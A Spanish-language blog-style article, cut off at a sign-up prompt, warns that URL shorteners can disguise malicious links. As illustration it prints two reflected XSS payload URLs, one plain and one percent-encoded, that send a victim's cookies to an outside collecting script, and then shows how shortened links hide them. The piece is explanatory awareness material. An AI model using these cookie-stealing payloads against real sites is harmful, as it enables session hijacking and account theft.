El peligro de los acortadores de url's
http://tinyurl.com/ykfuc64
Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que algun individuo de forma malintencionada puede“camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos unejemplo, un informatico ve que una nena muy linda, comparte un enlace de este tipo:
http://sitio.com/prueba.php?variable=”>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi?‘%20+document.cookie
o este:http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Para cualquier personacon sentido comun (bueno eso creo y espero) que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda. Pero que pasaria si se usa una web que nos recortala url? Nuestro enlace malicioso quedaria asi:
http://bit.ly/2SOKtG
o asi:
http://bit.ly/3hPNpy
Ahora si, mas de una persona daria click en ese enlace, si la nena linda...
Regístrate para leer el documento completo.